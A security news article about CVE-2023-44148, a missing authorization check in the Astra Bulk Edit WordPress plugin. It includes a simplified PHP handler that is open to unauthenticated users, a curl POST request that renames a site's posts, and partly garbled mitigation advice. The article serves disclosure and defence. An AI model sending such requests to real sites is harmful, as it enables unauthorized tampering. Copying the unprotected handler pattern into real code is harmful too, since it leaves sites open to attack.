CVE CyberSecurity Database News

CVE-2023-44148 - Missing Authorization in Astra Bulk Edit (v1.2.7 and Below) – How Attackers Can Hijack Your WordPress Site

Poster -

In late 2023, a concerning vulnerability—CVE-2023-44148—was disclosed in Astra Bulk Edit, a popular plugin made by Brainstorm Force. If you use Astra Bulk Edit (up to version 1.2.7), your WordPress site could be wide open to attackers. In this article, I’ll break down how the bug works, show you a code snippet that demonstrates the problem, and provide links to more resources.

What is Astra Bulk Edit?

Astra Bulk Edit is a WordPress plugin that lets admins quickly edit multiple posts, products, or pages. It’s made by the team behind the Astra theme, which is super popular in the WordPress community.

The Vulnerability in Simple Words

The problem is all about missing authorization checks. The plugin allows users to perform powerful actions, but it doesn’t properly verify if the user is *allowed* to do those actions. That means someone with a regular account—or even no account at all—could access features meant only for admins.

Versions: All versions up to and including 1.2.7

- Fixed in: Unknown at time of CVE release—check the plugin’s changelog for updates.

How Attackers Exploit CVE-2023-44148

Attackers can send specially crafted HTTP requests to your site to perform bulk actions—like editing posts—even if they’re not logged in as an admin. Here’s how it works:

Below is a simplified version (for learning only!) of what the bug looks like

// Located in one of Astra Bulk Edit's request handlers

add_action('wp_ajax_save_bulk_edit', 'abe_save_bulk_edit');
add_action('wp_ajax_nopriv_save_bulk_edit', 'abe_save_bulk_edit'); // <-- BIG PROBLEM!

function abe_save_bulk_edit() {
    // MISSING: check for current_user_can('edit_posts') or similar!
    $post_ids = $_POST['post_ids'];
    $new_title = $_POST['post_title'];

    foreach ( $post_ids as $id ) {
        wp_update_post([
            'ID'    => $id,
            'post_title' => $new_title,
        ]);
    }
    wp_send_json_success('Posts updated!');
}

It’s accessible to anyone (wp_ajax_nopriv_), including visitors who aren’t logged in.

- Attackers can bulk-edit your posts just by sending a POST request to /wp-admin/admin-ajax.php?action=save_bulk_edit.

An attacker could run this cURL command from the terminal

curl -X POST https://yoursite.com/wp-admin/admin-ajax.php \
  -d 'action=save_bulk_edit&post_ids[]=1&post_title=HackedByMe'

Result? Post #1 gets renamed “HackedByMe.”

- Attackers could change post content, publish drafts, or even mess with WooCommerce products if you use those!

Check for updates—disable the plugin if no update is available.

2. Remove/Disable Astra Bulk Edit

Original References & Further Reading

- WordPress Plugin Page: Astra Bulk Edit
- NVD CVE-2023-44148 Entry
- WPScan Advisory (often up-to-date on plugin vulnerabilities)
- Astra Bulk Edit Changelog

Takeaway

CVE-2023-44148 is a serious risk for any WordPress site using Astra Bulk Edit up to version 1.2.7. The missing authorization check means anyone can perform dangerous actions meant only for admins. Stay safe—always keep your plugins up to date, and if you suspect your site might be affected, remove or disable vulnerable plugins right away.

*Stay tuned to security feeds and plugin changelogs for the latest information.*

Timeline

Published on: 06/19/2024 12:15:10 UTC
Last modified on: 06/21/2024 14:45:49 UTC